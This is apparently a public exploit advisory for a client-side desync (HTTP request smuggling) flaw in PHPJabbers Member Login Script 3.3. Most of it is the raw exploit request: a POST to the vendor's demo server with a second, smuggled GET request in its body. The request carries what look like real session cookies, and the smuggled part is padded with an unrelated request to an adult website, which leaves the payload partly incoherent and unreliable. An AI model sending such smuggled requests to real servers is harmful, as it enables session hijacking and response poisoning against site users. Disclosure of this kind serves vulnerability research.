## Title: Member Login Script 3.3 - Client-side desync ## Author: nu11secur1ty ## Date: 08/25/2023 ## Vendor: https://www.phpjabbers.com/ ## Reference: https://portswigger.net/web-security/request-smuggling/browser/client-side-desync ## Description: The server appears to be vulnerable to client-side desync attacks. A POST request was sent to the path '/1692959852_473/index.php' with a second request sent as the body. The server ignored the Content-Length header and did not close the connection, leading to the smuggled request being interpreted as the next request. STATUS: HIGH Vulnerability [+]Exploit: ``` POST /1692959852_473/index.php?controller=pjFront&action=pjActionLoadCss HTTP/1.1 Host: demo.phpjabbers.com Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36 Connection: keep-alive Cache-Control: max-age=0 Cookie: _ga=GA1.2.2069938240.1692907228; _gid=GA1.2.1275975650.1692907228; _gat=1; _fbp=fb.1.1692907228280.366290059; _ga_NME5VTTGTT=GS1.2.1692957291.2.1.1692957719.60.0.0; YellowPages=slk3eokcgmdf0r3t7c020quv35; pjd=g0i8fch5jkebraaaf2812afvb5; pjd_1692957219_259=1 Upgrade-Insecure-Requests: 1 Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116" Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 Content-Length: 1190 Content-Type: application/x-www-form-urlencoded GET /robots.txt HTTP/1.1 Host: demo.phpjabbers.com Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36 Connection: keep-alive Cache-Control: max-age=0 GET /robots.txt HTTP/2 Host: www.pornhub.com Cookie: platform=pc; ss=405039333413129808; fg_0d2ec4cbd943df07ec161982a603817e=60256.100000; fg_9951ce1ac4434b4ac312a1334fa77d82=6902.100000 Cache-Control: max-age=0 Sec-Ch-Ua: Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Full-Version: "" Sec-Ch-Ua-Arch: "" Sec-Ch-Ua-Platform: "" Sec-Ch-Ua-Platform-Version: "" Sec-Ch-Ua-Model: "" Sec-Ch-Ua-Full-Version-List: Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Member-Login-Script-3.3) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/08/member-login-script-33-client-side.html) ## Time spend: 00:35:00